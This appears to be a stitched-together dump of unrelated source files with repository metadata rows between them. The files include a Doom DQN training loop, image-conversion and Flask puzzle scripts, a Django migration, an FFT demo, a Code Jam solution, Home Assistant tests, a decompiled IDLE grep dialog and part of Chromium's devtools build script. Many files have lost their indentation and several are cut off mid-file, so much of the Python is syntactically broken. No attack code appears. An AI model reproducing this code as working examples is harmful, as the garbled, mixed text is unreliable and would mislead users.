max_life = 0 # Maximum episode life (Proxy for agent performance)
life = 0
# Buffer to compute rolling statistics
tot_reward_buffer, life_buffer, ammo_buffer, kills_buffer, mavg_score, \
var_score, mavg_ammo_left, mavg_kill_counts, \
mavg_tot_rewards = [], [], [], [], [], [], [], [], []
losses_buffer, epsilon_buffer, stats_store = [], [], []
episode_co = 1
while not game.is_episode_finished():
loss = 0
r_t = 0
a_t = np.zeros([action_size])
# Epsilon Greedy
action_idx = agent.get_action(s_t)
a_t[action_idx] = 1
a_t = a_t.astype(int)
game.set_action(a_t.tolist())
skiprate = agent.frame_per_action
game.advance_action(skiprate)
game_state = game.get_state() # Observe again after we take the action
is_terminated = game.is_episode_finished()
r_t = game.get_last_reward() #each frame we get reward of 0.1, so 4 frames will be 0.4
if (is_terminated):
if (life > max_life):
max_life = life
GAME += 1
life_buffer.append(life)
ammo_buffer.append(misc[1])
kills_buffer.append(misc[0])
print("Episode Finish ", misc)
game.new_episode("./episode_rec/ep" + str(episode_co) + "_rec.lmp")
episode_co += 1
game_state = game.get_state()
misc = game_state.game_variables
x_t1 = game_state.screen_buffer
x_t1 = game_state.screen_buffer
misc = game_state.game_variables
x_t1 = preprocessImg(x_t1, size=(img_rows, img_cols))
x_t1 = np.reshape(x_t1, (1, img_rows, img_cols, 1))
s_t1 = np.append(x_t1, s_t[:, :, :, :3], axis=3)
r_t = agent.shape_reward(r_t, misc, prev_misc, t)
if (is_terminated):
life = 0
else:
life += 1
#update the cache
prev_misc = misc
# save the sample <s, a, r, s'> to the replay memory and decrease epsilon
agent.replay_memory(s_t, action_idx, r_t, s_t1, is_terminated, t)
# Do the training
if t > agent.observe and t % agent.timestep_per_train == 0:
loss = agent.train_replay()
losses_buffer.append({'loss': loss, 'episode': GAME})
s_t = s_t1
t += 1
# save progress every 10000 iterations
if t % 10000 == 0:
print("Now we save model")
agent.model.save_weights("./models/c51_ddqn.h5", overwrite=True)
# print info
state = ""
if t <= agent.observe:
state = "observe"
elif t > agent.observe and t <= agent.observe + agent.explore:
state = "explore"
else:
state = "train"
if is_terminated:
print("TIME", t, "/ GAME", GAME, "/ STATE", state, \
"/ EPSILON", agent.epsilon, "/ ACTION", action_idx, "/ REWARD", r_t, \
"/ LIFE", max_life, "/ LOSS", loss)
epsilon_buffer.append(agent.epsilon)
tot_reward_buffer.append(r_t)
# Save Agent's Performance Statistics
if GAME % agent.stats_window_size == 0 and t > agent.observe:
print("Update Rolling Statistics")
agent.mavg_score.append(np.mean(np.array(life_buffer)))
agent.var_score.append(np.var(np.array(life_buffer)))
agent.mavg_ammo_left.append(np.mean(np.array(ammo_buffer)))
agent.mavg_kill_counts.append(np.mean(np.array(kills_buffer)))
mavg_tot_rewards.append(np.mean(np.array(tot_reward_buffer)))
# Reset rolling stats buffer
life_buffer, ammo_buffer, kills_buffer = [], [], []
# Write Rolling Statistics to file
with open("./c51_ddqn_stats.txt", "w") as stats_file:
stats_file.write('Game: ' + str(GAME) + '\n')
stats_file.write('Max Score: ' + str(max_life) + '\n')
stats_file.write('mavg_score: ' + str(agent.mavg_score) + '\n')
stats_file.write('var_score: ' + str(agent.var_score) + '\n')
stats_file.write('mavg_ammo_left: ' + str(agent.mavg_ammo_left) + '\n')
stats_file.write('mavg_kill_counts: ' + str(agent.mavg_kill_counts) + '\n')
stats_file.write('mavg_rewards: ' + str(mavg_tot_rewards) + "\n")
with open("./ddqn_pr_steps_stats" + str(GAME) + ".pickle",
'wb') as handle:
                stats_store.append(
                    {'game': GAME, 'max_score': max_life,
                     'mavg_score': agent.mavg_score,
                     'var_score': agent.var_score,
                     'mavg_ammo_left': agent.mavg_ammo_left,
                     'mavg_kill_counts': agent.mavg_kill_counts,
                     'mavg_tot_rewards': mavg_tot_rewards})
                # list.append returns None, so append first and pickle the list
                pickle.dump(stats_store, handle,
                            protocol=pickle.HIGHEST_PROTOCOL)
with open("./buffer_dic_data" + str(GAME) + ".pickle", 'wb') as handle:
                stats_store.append({'life_buffer': life_buffer,
                                    'ammo_buffer': ammo_buffer,
                                    'kills_buffer': kills_buffer,
                                    'tot_reward_buffer': tot_reward_buffer,
                                    'losses': losses_buffer,
                                    'epsilon': epsilon_buffer})
                # append first (it returns None), then pickle the list itself
                pickle.dump(stats_store,
handle, protocol=pickle.HIGHEST_PROTOCOL) | [
"[email protected]"
] | |
44128fe6dc5acae5eb8b887074251d66121ca915 | fd1f0606ea14cfb69429430d4d8cb5a5a0616ee3 | /python_code/yolo/convert_to_jpg.py | e9816e8e62a6dc828bee1debc266feedf66b6dbb | [] | no_license | mukulbhave/viden | 4fbae0bbfefae2b7e35623de12123c4371037420 | 848b16fa32cd0f180ab80a98254edd2147ea3948 | refs/heads/master | 2023-06-01T16:29:40.131295 | 2021-06-16T10:37:17 | 2021-06-16T10:37:17 | 257,380,167 | 0 | 0 | null | 2021-06-01T16:53:22 | 2020-04-20T19:13:57 | Python | UTF-8 | Python | false | false | 1,146 | py | from PIL import Image
import os, sys,re , fnmatch
import numpy as np
import glob
input_path = "C:\\Users\\sudhir\\Downloads\\EngImg\\"
out="C:\\dataset\\viden_numberplates\\out\\"
def rename(path, dirs):  # path/dirs were previously undefined globals
    for index, item in enumerate(dirs):
if item.endswith(".xml"):
x=item.find('-')
print("Renaming "+item+" as "+out +item[x+1:])
#if os.path.isfile(path+item):
os.rename(path+item,out +item[x+1:])
def convert_png_to_jpg():
    count = 0  # start at 0 so the final count equals the files processed
for root, dirnames, filenames in os.walk(input_path):
print("processing: "+root)
for f_name in fnmatch.filter(filenames, '*.png'):
file_path=os.path.join(root, f_name)
print("reading file: "+file_path)
im = Image.open(file_path)
rgb_im = im.convert('RGB')
f_name=f_name.replace(".png",".jpg")
out_path= os.path.join(out, f_name)
print("saving: "+out_path)
rgb_im.save(out_path, 'JPEG', quality=90)
count+=1
print("Processed Files:"+str(count))
convert_png_to_jpg() | [
"[email protected]"
] | |
b7e02524df176839009c27ff8e612e57db07bef9 | 13f03eb35aeb306e0a33d67437993f849d5b0e8d | /CS110 Intro to Python/Project 2/project2 no extra credit.py | da45097dc3486773e6bfa601825fd80804437b4e | [] | no_license | jalague/Projects | cee07f49e41a33e9529317b6beace2bb7b56e1c6 | 5e1a15cdf10ff8f878474011a04868b15334aad5 | refs/heads/master | 2021-01-12T08:28:13.707957 | 2019-12-03T01:23:32 | 2019-12-03T01:23:32 | 76,586,724 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,488 | py | import flask
import PIL
from flask import request
from flask import redirect
from imageHelperFunctions import *
import os, os.path
app=flask.Flask(__name__)
def editImage(option,filename,newname):
im=openImageFile(filename)
w,h=size(im)
for i in range(0,h):
for j in range(0,w):
r,g,b= getPixel((j,i),im)
if option==1:
setPixel((j,i),im, (r*20,0,0))
elif option==2:
setPixel((j,i),im, (0,g*20,0))
elif option==3:
setPixel((j,i),im, (0,0,b*20))
#showImage(im)
saveImageFile(im,newname,"PNG")
@app.route('/')
def displayPuzzle():
print("In displayPuzzle")
if not os.path.exists('static/newimage1.png'):
editImage(1,"static/distortedImage1.png", "static/newimage1.png")
if not os.path.exists('static/newimage2.png'):
editImage(2,"static/distortedImage1.png", "static/newimage2.png")
if not os.path.exists('static/newimage3.png'):
editImage(3,"static/distortedImage1.png", "static/newimage3.png")
html=''
html+='<!DOCTYPE html>\n'
html+='<html>\n'
html+='<body>\n'
html+=" <h1>Image Puzzle</h1>\n"
    html+=' <p> Apply one of the operations below to the image, and see if you can guess what famous object is in the image! </p>\n'
html+='<img src="/static/distortedImage1.png" alt="distortedImage1"style="width:1024px;height:683px" >\n'
html+='<br>\n'
html+='Pick an Operation:<br>\n'
html+='<form method="POST" action="/showimage">\n'
html+='<input type="radio" name="operation" value="red">Set blue and green pixels to 0 and multiple red ones by 20<br>\n'
html+='<input type="radio" name="operation" value="green">Set blue and red pixels to 0 and multiple green ones by 20<br>\n'
html+='<input type="radio" name="operation" value="blue">Set blue and green pixels to 0 and multiple red ones by 20<br>\n'
html+='<input type="submit" value="Apply Operations" />\n'
    html+='</form>\n'
html+='</body>\n'
html+='</html>\n'
return html
@app.route("/showimage", methods=['POST'])
def showEditedimage():
html=''
html+='<!DOCTYPE html>\n'
html+='<html>\n'
html+='<body>\n'
operation=request.form["operation"]
if operation=="red":
html+='<img src="/static/newimage1.png" alt="newimage" style="width:1024px;height:683px" >\n'
elif operation=="green":
html+='<img src="/static/newimage2.png" alt="newimage" style="width:1024px;height:683px" >\n'
elif operation=="blue":
html+='<img src="/static/newimage3.png" alt="newimage" style="width:1024px;height:683px" >\n'
html+='<br>\n'
html += '<form method="POST" action="/guessImage">\n'
html += 'Enter your guess <input type="text" name="guess"/>\n'
    html += '</form>\n'
html+='</body>\n'
html+='</html>\n'
return html
@app.route("/guessImage", methods=['POST'])
def guessImage():
guess=request.form["guess"]
if guess=="White House" or guess=="white house" or guess=="the white house" or guess=="The White House" or guess=="the White House":
return "Correct!"
else:
return redirect('/')
if __name__ == '__main__':
app.run()
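# For local development only (assumption): app.run(debug=True) enables the
# auto-reloader and the interactive debugger.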
| [
"[email protected]"
] | |
717a9d888661f024fbf061eb7916b15f9e48b045 | 77e9396349c6a41dfeec9e270aec37df5871b652 | /code/option2/sut_test.py | c8dfb9fca16c6263aa78dc96f2810518ee0f8cdb | [] | no_license | sryabkov/python_modules_vscode | b62682c465c2dca81749ec48bafb616cf99e59b4 | d1d88a0af55ba540d5e6ff230655a57723b9cb8b | refs/heads/master | 2020-04-24T06:30:56.350656 | 2019-02-21T00:08:26 | 2019-02-21T00:08:26 | 171,767,375 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 247 | py | """
Test for sut.py
"""
from .sut import some_method_that_returns_string
def test_some_method_that_returns_string():
assert some_method_that_returns_string() == "noop"
if __name__ == "__main__":
test_some_method_that_returns_string()
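# Normally run via pytest from the package root (sketch):
#     python -m pytest code/option2/sut_test.py
# Note the relative import above requires running this file as part of its
# package rather than as a standalone script.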
| [
"[email protected]"
] | |
3b93255b073c2a9385971e2b9e090d3cb24606ca | 22e4f8c3fd76f099ad05b8ea0e53366878358d44 | /oil_trading/data/prepare_bloomberg_data.py | 333c76de2173719dbaf37701e0db085f5be7f4dc | [
"MIT"
] | permissive | queiyanglim/trading_algorithm | 272762b97bb3ab15e8174b2cea529f8df525e705 | 959de9ecb503b9de97528e06e57d40382dec9a65 | refs/heads/master | 2021-02-17T23:44:54.909650 | 2021-01-21T15:37:14 | 2021-01-21T15:37:14 | 245,137,152 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 676 | py | import pandas as pd
def get_bbg_data():
""" Daily prices since 1990"""
path = "https://github.com/queiyanglim/trading_algorithm/raw/master/oil_trading/data/oil_prices.csv"
df_pull = pd.read_csv(path, header=[0], index_col = 0)
df_pull = df_pull[["CO1 Comdty", "CL1 Comdty"]]
df_pull.index.name = "timestamp"
df_pull = df_pull.rename(columns = {"CO1 Comdty": "brent",
"CL1 Comdty": "wti"})
df_pull.index = pd.to_datetime(df_pull.index, format = "%d/%m/%Y")
df = df_pull.copy()
df["spread"] = df.brent - df.wti
# df = df.tail(2000)
# df = np.log(df).diff()
df = df.dropna()
return df | [
"[email protected]"
] | |
26cf7f5c49e7790eba3ae1742d71f32697b120fb | fff114e3cb9568fd04e3ee3ccf4b8edac9aece81 | /djangoblog/blogapp/migrations/0004_gory.py | 077977c924d51289d1913c5381b2fee756863028 | [] | no_license | 15SaswatiSingh/Python-in-Django-Framwork-travel-and-tourism- | 1572a589e2ee93ff574ea8d5d68db7b77e34d02e | b4ae21ce2942c4a4db4524f6f164bb5b6f789c86 | refs/heads/master | 2023-03-16T01:57:15.486262 | 2019-03-01T11:23:39 | 2019-03-01T11:23:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 512 | py | # Generated by Django 2.1.3 on 2019-02-09 03:57
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('blogapp', '0003_auto_20190209_0013'),
]
operations = [
migrations.CreateModel(
name='gory',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
],
),
]
| [
"[email protected]"
] | |
12e031215e23497b73989ea4cf0808a1ec95f07e | 575ad5e7d90ae1c8121bcb8250cff94290e6ada8 | /Day3/fft1.py | e871f4320311f97675cb183a391145c391847372 | [] | no_license | sammita94/Image-Lab | 472aaa8db7b1fd71269450c99cb704bfd0a9f797 | a3c548ba23bf4da89220c503e7eacdea0a1e653c | refs/heads/master | 2020-07-23T05:49:57.441291 | 2016-11-16T04:27:12 | 2016-11-16T04:27:12 | 73,814,180 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 911 | py | """Code for Discrete Fourier Transform using numpy functions
"""
import cv2
import numpy as np
from matplotlib import pyplot as plt
img = cv2.imread('fft.jpg',0)
#Fourier Transform
f = np.fft.fft2(img)
#Shifting the DC component from top left to center
fshift = np.fft.fftshift(f)
#Finding the Magnitude Spectrum
magnitude_spectrum = 20*np.log(np.abs(fshift))
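# Note (added): np.abs(fshift) can contain zeros, so log() may emit -inf /
# divide-by-zero warnings; a common guard is 20*np.log(np.abs(fshift) + 1).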
#Shifting the DC component back to the top left corner
f_ishift = np.fft.ifftshift(fshift)
#Inverse Fourier Transform
img_back = np.fft.ifft2(f_ishift)
img_back = np.abs(img_back)
plt.subplot(131),plt.imshow(img, cmap = 'gray')
plt.title('Input Image'), plt.xticks([]), plt.yticks([])
plt.subplot(132),plt.imshow(magnitude_spectrum, cmap = 'gray')
plt.title('Magnitude Spectrum'), plt.xticks([]), plt.yticks([])
plt.subplot(133),plt.imshow(img_back, cmap = 'gray')
plt.title('Reconstructed Image (Inverse FFT)'), plt.xticks([]), plt.yticks([])
plt.show()
| [
"[email protected]"
] | |
82792a3be9979e79865b11f08d068150204766e1 | 2c74bb301f1ed83b79254944183ac5a18a639fdf | /tests/components/select/test_device_condition.py | 7c1dc443e5626cdb246bbc9a3f633cbd756d466c | [
"Apache-2.0"
] | permissive | Adminiuga/home-assistant | 5bec93007ddac1a268cc359bf7e48530c5f73b38 | dcf68d768e4f628d038f1fdd6e40bad713fbc222 | refs/heads/dev | 2023-02-22T22:03:31.013931 | 2022-11-09T00:27:20 | 2022-11-09T00:27:20 | 123,929,062 | 5 | 4 | Apache-2.0 | 2023-02-22T06:14:31 | 2018-03-05T14:11:09 | Python | UTF-8 | Python | false | false | 8,288 | py | """The tests for Select device conditions."""
from __future__ import annotations
import pytest
import voluptuous_serialize
from homeassistant.components import automation
from homeassistant.components.device_automation import DeviceAutomationType
from homeassistant.components.select import DOMAIN
from homeassistant.components.select.device_condition import (
async_get_condition_capabilities,
)
from homeassistant.core import HomeAssistant, ServiceCall
from homeassistant.helpers import (
config_validation as cv,
device_registry,
entity_registry,
)
from homeassistant.helpers.entity import EntityCategory
from homeassistant.setup import async_setup_component
from tests.common import (
MockConfigEntry,
assert_lists_same,
async_get_device_automations,
async_mock_service,
mock_device_registry,
mock_registry,
)
@pytest.fixture
def device_reg(hass: HomeAssistant) -> device_registry.DeviceRegistry:
"""Return an empty, loaded, registry."""
return mock_device_registry(hass)
@pytest.fixture
def entity_reg(hass: HomeAssistant) -> entity_registry.EntityRegistry:
"""Return an empty, loaded, registry."""
return mock_registry(hass)
@pytest.fixture
def calls(hass: HomeAssistant) -> list[ServiceCall]:
"""Track calls to a mock service."""
return async_mock_service(hass, "test", "automation")
async def test_get_conditions(
hass: HomeAssistant,
device_reg: device_registry.DeviceRegistry,
entity_reg: entity_registry.EntityRegistry,
) -> None:
"""Test we get the expected conditions from a select."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(DOMAIN, "test", "5678", device_id=device_entry.id)
expected_conditions = [
{
"condition": "device",
"domain": DOMAIN,
"type": "selected_option",
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
"metadata": {"secondary": False},
}
]
conditions = await async_get_device_automations(
hass, DeviceAutomationType.CONDITION, device_entry.id
)
assert_lists_same(conditions, expected_conditions)
@pytest.mark.parametrize(
"hidden_by,entity_category",
(
(entity_registry.RegistryEntryHider.INTEGRATION, None),
(entity_registry.RegistryEntryHider.USER, None),
(None, EntityCategory.CONFIG),
(None, EntityCategory.DIAGNOSTIC),
),
)
async def test_get_conditions_hidden_auxiliary(
hass,
device_reg,
entity_reg,
hidden_by,
entity_category,
):
"""Test we get the expected conditions from a hidden or auxiliary entity."""
config_entry = MockConfigEntry(domain="test", data={})
config_entry.add_to_hass(hass)
device_entry = device_reg.async_get_or_create(
config_entry_id=config_entry.entry_id,
connections={(device_registry.CONNECTION_NETWORK_MAC, "12:34:56:AB:CD:EF")},
)
entity_reg.async_get_or_create(
DOMAIN,
"test",
"5678",
device_id=device_entry.id,
entity_category=entity_category,
hidden_by=hidden_by,
)
expected_conditions = [
{
"condition": "device",
"domain": DOMAIN,
"type": condition,
"device_id": device_entry.id,
"entity_id": f"{DOMAIN}.test_5678",
"metadata": {"secondary": True},
}
for condition in ["selected_option"]
]
conditions = await async_get_device_automations(
hass, DeviceAutomationType.CONDITION, device_entry.id
)
assert_lists_same(conditions, expected_conditions)
async def test_if_selected_option(
hass: HomeAssistant, calls: list[ServiceCall]
) -> None:
"""Test for selected_option conditions."""
assert await async_setup_component(
hass,
automation.DOMAIN,
{
automation.DOMAIN: [
{
"trigger": {"platform": "event", "event_type": "test_event1"},
"condition": [
{
"condition": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": "select.entity",
"type": "selected_option",
"option": "option1",
}
],
"action": {
"service": "test.automation",
"data": {
"result": "option1 - {{ trigger.platform }} - {{ trigger.event.event_type }}"
},
},
},
{
"trigger": {"platform": "event", "event_type": "test_event2"},
"condition": [
{
"condition": "device",
"domain": DOMAIN,
"device_id": "",
"entity_id": "select.entity",
"type": "selected_option",
"option": "option2",
}
],
"action": {
"service": "test.automation",
"data": {
"result": "option2 - {{ trigger.platform }} - {{ trigger.event.event_type }}"
},
},
},
]
},
)
# Test with non existing entity
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 0
hass.states.async_set(
"select.entity", "option1", {"options": ["option1", "option2"]}
)
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 1
assert calls[0].data["result"] == "option1 - event - test_event1"
hass.states.async_set(
"select.entity", "option2", {"options": ["option1", "option2"]}
)
hass.bus.async_fire("test_event1")
hass.bus.async_fire("test_event2")
await hass.async_block_till_done()
assert len(calls) == 2
assert calls[1].data["result"] == "option2 - event - test_event2"
async def test_get_condition_capabilities(hass: HomeAssistant) -> None:
"""Test we get the expected capabilities from a select condition."""
config = {
"platform": "device",
"domain": DOMAIN,
"type": "selected_option",
"entity_id": "select.test",
"option": "option1",
}
# Test when entity doesn't exists
capabilities = await async_get_condition_capabilities(hass, config)
assert capabilities
assert "extra_fields" in capabilities
assert voluptuous_serialize.convert(
capabilities["extra_fields"], custom_serializer=cv.custom_serializer
) == [
{
"name": "option",
"required": True,
"type": "select",
"options": [],
},
{
"name": "for",
"optional": True,
"type": "positive_time_period_dict",
},
]
# Mock an entity
hass.states.async_set("select.test", "option1", {"options": ["option1", "option2"]})
# Test if we get the right capabilities now
capabilities = await async_get_condition_capabilities(hass, config)
assert capabilities
assert "extra_fields" in capabilities
assert voluptuous_serialize.convert(
capabilities["extra_fields"], custom_serializer=cv.custom_serializer
) == [
{
"name": "option",
"required": True,
"type": "select",
"options": [("option1", "option1"), ("option2", "option2")],
},
{
"name": "for",
"optional": True,
"type": "positive_time_period_dict",
},
]
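# Run note (added): execute just this module with, e.g.
#   pytest tests/components/select/test_device_condition.py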
| [
"[email protected]"
] | |
8479fc36a34cd92829460ba09dac9233003f21e2 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_145/588.py | bc85913e20b14805e33519ef4c6568305d07637f | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,649 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import math
def read(f):
n = int(f.readline().strip())
for i in xrange(n):
p, q = map(int, f.readline().strip().split('/'))
yield p, q
def main(f):
for i, (p, q) in enumerate(read(f)):
if 2 ** int(math.log(q) / math.log(2)) != q:
print("Case #{0}: impossible".format(i+1))
else:
n = int(math.ceil((math.log(q) - math.log(p)) / math.log(2)))
print("Case #{0}: {1}".format(i+1, n))
_input = """
5
1/2
3/4
1/4
2/23
123/31488
""".strip()
_output = """
Case #1: 1
Case #2: 1
Case #3: 2
Case #4: impossible
Case #5: 8
""".strip()
def test_main(compare=False):
import sys
from difflib import unified_diff
from StringIO import StringIO
if compare:
stdout = sys.stdout
sys.stdout = StringIO()
try:
main(StringIO(_input))
result = sys.stdout.getvalue().strip()
finally:
sys.stdout = stdout
print(result)
for line in unified_diff(result.splitlines(), _output.splitlines(),
'Output', 'Expect', lineterm=''):
print(line)
if result == _output:
print("OK")
else:
print("NG")
else:
main(StringIO(_input))
if __name__ == '__main__':
test = False
compare = False
if test:
test_main(compare)
else:
import sys
if len(sys.argv) > 1:
f = open(sys.argv[1])
main(f)
f.close()
else:
main(sys.stdin)
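# Note (added): the power-of-two check above goes through float log() and can
# misjudge very large q; an exact integer test is:
#   is_pow2 = q > 0 and (q & (q - 1)) == 0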
| [
"[email protected]"
] | |
041cf40053b8f029ba5b1f64754d2048cbb70f5e | 2af6a5c2d33e2046a1d25ae9dd66d349d3833940 | /res_bw/scripts/common/lib/idlelib/grepdialog.py | 05f4b74a7d37f75455c785428aa681b07d431a4b | [] | no_license | webiumsk/WOT-0.9.12-CT | e6c8b5bb106fad71b5c3056ada59fb1aebc5f2b2 | 2506e34bd6634ad500b6501f4ed4f04af3f43fa0 | refs/heads/master | 2021-01-10T01:38:38.080814 | 2015-11-11T00:08:04 | 2015-11-11T00:08:04 | 45,803,240 | 0 | 0 | null | null | null | null | WINDOWS-1250 | Python | false | false | 4,154 | py | # 2015.11.10 21:36:11 Střední Evropa (běžný čas)
# Embedded file name: scripts/common/Lib/idlelib/GrepDialog.py
import os
import fnmatch
import sys
from Tkinter import *
from idlelib import SearchEngine
from idlelib.SearchDialogBase import SearchDialogBase
def grep(text, io = None, flist = None):
root = text._root()
engine = SearchEngine.get(root)
if not hasattr(engine, '_grepdialog'):
engine._grepdialog = GrepDialog(root, engine, flist)
dialog = engine._grepdialog
searchphrase = text.get('sel.first', 'sel.last')
dialog.open(text, searchphrase, io)
class GrepDialog(SearchDialogBase):
title = 'Find in Files Dialog'
icon = 'Grep'
needwrapbutton = 0
def __init__(self, root, engine, flist):
SearchDialogBase.__init__(self, root, engine)
self.flist = flist
self.globvar = StringVar(root)
self.recvar = BooleanVar(root)
def open(self, text, searchphrase, io = None):
SearchDialogBase.open(self, text, searchphrase)
if io:
path = io.filename or ''
else:
path = ''
dir, base = os.path.split(path)
head, tail = os.path.splitext(base)
if not tail:
tail = '.py'
self.globvar.set(os.path.join(dir, '*' + tail))
def create_entries(self):
SearchDialogBase.create_entries(self)
self.globent = self.make_entry('In files:', self.globvar)
def create_other_buttons(self):
f = self.make_frame()
btn = Checkbutton(f, anchor='w', variable=self.recvar, text='Recurse down subdirectories')
btn.pack(side='top', fill='both')
btn.select()
def create_command_buttons(self):
SearchDialogBase.create_command_buttons(self)
self.make_button('Search Files', self.default_command, 1)
def default_command(self, event = None):
prog = self.engine.getprog()
if not prog:
return
path = self.globvar.get()
if not path:
self.top.bell()
return
from idlelib.OutputWindow import OutputWindow
save = sys.stdout
try:
sys.stdout = OutputWindow(self.flist)
self.grep_it(prog, path)
finally:
sys.stdout = save
def grep_it(self, prog, path):
dir, base = os.path.split(path)
list = self.findfiles(dir, base, self.recvar.get())
list.sort()
self.close()
pat = self.engine.getpat()
print 'Searching %r in %s ...' % (pat, path)
hits = 0
for fn in list:
try:
with open(fn) as f:
for lineno, line in enumerate(f, 1):
if line[-1:] == '\n':
line = line[:-1]
if prog.search(line):
sys.stdout.write('%s: %s: %s\n' % (fn, lineno, line))
hits += 1
except IOError as msg:
print msg
print 'Hits found: %s\n(Hint: right-click to open locations.)' % hits if hits else 'No hits.'
def findfiles(self, dir, base, rec):
try:
names = os.listdir(dir or os.curdir)
except os.error as msg:
print msg
return []
list = []
subdirs = []
for name in names:
fn = os.path.join(dir, name)
if os.path.isdir(fn):
subdirs.append(fn)
elif fnmatch.fnmatch(name, base):
list.append(fn)
if rec:
for subdir in subdirs:
list.extend(self.findfiles(subdir, base, rec))
return list
def close(self, event = None):
if self.top:
self.top.grab_release()
self.top.withdraw()
if __name__ == '__main__':
import unittest
unittest.main('idlelib.idle_test.test_grep', verbosity=2, exit=False)
# okay decompyling c:\Users\PC\wotsources\files\originals\res_bw\scripts\common\lib\idlelib\grepdialog.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2015.11.10 21:36:11 Central Europe (Standard Time)
| [
"[email protected]"
] | |
a4de72f9bc8c298600db4419ce1778b70f3c07b5 | 89dedd7f3c7acc81d12e2bcb2e716f9af9e5fa04 | /third_party/WebKit/Source/devtools/scripts/concatenate_application_code.py | e6984e04864e14767f6fd64ff23f1ddfb871c822 | [
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-1.0-or-later",
"MIT",
"Apache-2.0",
"LicenseRef-scancode-warranty-disclaimer",
"LGPL-2.1-only",
"GPL-2.0-only",
"LGPL-2.0-only",
"BSD-2-Clause",
"LicenseRef-scancode-other-copyleft"
] | permissive | bino7/chromium | 8d26f84a1b6e38a73d1b97fea6057c634eff68cb | 4666a6bb6fdcb1114afecf77bdaa239d9787b752 | refs/heads/master | 2022-12-22T14:31:53.913081 | 2016-09-06T10:05:11 | 2016-09-06T10:05:11 | 67,410,510 | 1 | 3 | BSD-3-Clause | 2022-12-17T03:08:52 | 2016-09-05T10:11:59 | null | UTF-8 | Python | false | false | 9,961 | py | #!/usr/bin/env python
#
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Release:
- Concatenates autostart modules, application modules' module.json descriptors,
and the application loader into a single script.
- Builds app.html referencing the application script.
Debug:
- Copies the module directories into their destinations.
- Copies app.html as-is.
"""
from cStringIO import StringIO
from os import path
from os.path import join
from modular_build import read_file, write_file, bail_error
import copy
import modular_build
import os
import re
import shutil
import sys
try:
import simplejson as json
except ImportError:
import json
import rjsmin
def resource_source_url(url):
return '\n/*# sourceURL=' + url + ' */'
def minify_js(javascript):
return rjsmin.jsmin(javascript)
def concatenated_module_filename(module_name, output_dir):
return join(output_dir, module_name + '/' + module_name + '_module.js')
def symlink_or_copy_file(src, dest, safe=False):
if safe and path.exists(dest):
os.remove(dest)
if hasattr(os, 'symlink'):
os.symlink(src, dest)
else:
shutil.copy(src, dest)
def symlink_or_copy_dir(src, dest):
if path.exists(dest):
shutil.rmtree(dest)
for src_dir, dirs, files in os.walk(src):
subpath = path.relpath(src_dir, src)
dest_dir = path.normpath(join(dest, subpath))
os.mkdir(dest_dir)
for name in files:
src_name = join(os.getcwd(), src_dir, name)
dest_name = join(dest_dir, name)
symlink_or_copy_file(src_name, dest_name)
class AppBuilder:
def __init__(self, application_name, descriptors, application_dir, output_dir):
self.application_name = application_name
self.descriptors = descriptors
self.application_dir = application_dir
self.output_dir = output_dir
def app_file(self, extension):
return self.application_name + '.' + extension
def core_resource_names(self):
result = []
for module in self.descriptors.sorted_modules():
if self.descriptors.application[module].get('type') != 'autostart':
continue
resources = self.descriptors.modules[module].get('resources')
if not resources:
continue
for resource_name in resources:
result.append(path.join(module, resource_name))
return result
# Outputs:
# <app_name>.html
# <app_name>.js
# <module_name>_module.js
class ReleaseBuilder(AppBuilder):
def __init__(self, application_name, descriptors, application_dir, output_dir):
AppBuilder.__init__(self, application_name, descriptors, application_dir, output_dir)
def build_app(self):
if self.descriptors.has_html:
self._build_html()
self._build_app_script()
for module in filter(lambda desc: (not desc.get('type') or desc.get('type') == 'remote'), self.descriptors.application.values()):
self._concatenate_dynamic_module(module['name'])
def _build_html(self):
html_name = self.app_file('html')
output = StringIO()
with open(join(self.application_dir, html_name), 'r') as app_input_html:
for line in app_input_html:
if '<script ' in line or '<link ' in line:
continue
if '</head>' in line:
output.write(self._generate_include_tag(self.app_file('js')))
output.write(line)
write_file(join(self.output_dir, html_name), output.getvalue())
output.close()
def _build_app_script(self):
script_name = self.app_file('js')
output = StringIO()
self._concatenate_application_script(output)
write_file(join(self.output_dir, script_name), minify_js(output.getvalue()))
output.close()
def _generate_include_tag(self, resource_path):
if (resource_path.endswith('.js')):
return ' <script type="text/javascript" src="%s"></script>\n' % resource_path
else:
assert resource_path
def _release_module_descriptors(self):
module_descriptors = self.descriptors.modules
result = []
for name in module_descriptors:
module = copy.copy(module_descriptors[name])
module_type = self.descriptors.application[name].get('type')
# Clear scripts, as they are not used at runtime
# (only the fact of their presence is important).
resources = module.get('resources', None)
if module.get('scripts') or resources:
if module_type == 'autostart':
# Autostart modules are already baked in.
del module['scripts']
else:
# Non-autostart modules are vulcanized.
module['scripts'] = [name + '_module.js']
# Resources are already baked into scripts.
if resources is not None:
del module['resources']
result.append(module)
return json.dumps(result)
